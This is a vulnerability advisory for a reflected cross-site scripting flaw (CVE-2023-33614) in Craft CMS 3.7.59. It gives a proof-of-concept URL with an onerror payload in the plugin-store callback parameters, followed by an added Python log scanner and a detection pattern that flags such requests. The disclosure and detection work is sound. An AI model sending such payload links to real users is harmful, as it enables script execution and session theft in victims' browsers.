[CVE-2023-33614] Reflected Cross-Site Scripting (XSS)
Exploit Author: Dat Nguyen aka datnlq of VietSunshine Cyber Security Services
Vendor of Product: CraftCMS
Affected Product Code Base: 3.7.59
CVE: CVE-2023-33614
Description: Craft CMS version 3.7.59 is vulnerable to reflected XSS, which allows a remote unauthenticated attacker to execute JavaScript code via the error and message parameters.
Steps to reproduce:
Send the URL http://localhost/craftcms/web/admin/plugin-store/callback?error=error%3C/script%3E%3Cimg+src=x+onerror=alert(document.domain)%3E&message=message%3C/script%3E%3Cimg+src=x+onerror=alert(document.domain)%3E to the victim. When the user clicks the link, the XSS payload executes.
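For defenders, one way to look for delivery attempts in web server access logs, as an added example that is not part of the original advisory: it flags requests to the callback path whose error or message value decodes to HTML markup. The log format, the sample lines and the markup heuristic are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint and parameter names come from the advisory; the "admin" segment
# may differ on sites that changed the control panel path.
CALLBACK_PATH = "/admin/plugin-store/callback"
REFLECTED_PARAMS = ("error", "message")

# Markup that a plain status string should never contain (a heuristic).
MARKUP = re.compile(r"[<>\"']|javascript:|\bon\w+\s*=", re.IGNORECASE)

# Request line as written in Common/Combined Log Format.
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(target):
    """Return {param: decoded value} for error/message values carrying markup."""
    parts = urlsplit(target)
    if not parts.path.rstrip("/").endswith(CALLBACK_PATH):
        return {}
    # parse_qs percent-decodes once and turns '+' into a space.
    query = parse_qs(parts.query, keep_blank_values=True)
    hits = {}
    for name in REFLECTED_PARAMS:
        for value in query.get(name, []):
            if MARKUP.search(value):
                hits[name] = value
    return hits

def scan(log_lines):
    """Return [(line_number, hits)] for lines requesting the callback with markup."""
    findings = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_LINE.search(line)
        hits = suspicious_params(match.group(1)) if match else {}
        if hits:
            findings.append((number, hits))
    return findings

# Constructed sample access-log lines (documentation IP addresses).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jun/2023:10:00:00 +0000] "GET /craftcms/web/admin/plugin-store/callback?error=access_denied&message=User+cancelled HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jun/2023:10:02:11 +0000] "GET /craftcms/web/admin/plugin-store/callback?error=error%3C/script%3E%3Cimg+src=x+onerror=alert(document.domain)%3E&message=ok HTTP/1.1" 200 734',
    '198.51.100.7 - - [01/Jun/2023:10:03:40 +0000] "GET /craftcms/web/search?error=%3Cb%3E HTTP/1.1" 200 120',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(f"line {number}: {hits}")
```

The check decodes each value once, so it mirrors what the application receives; tune the markup pattern against your own traffic before alerting on it.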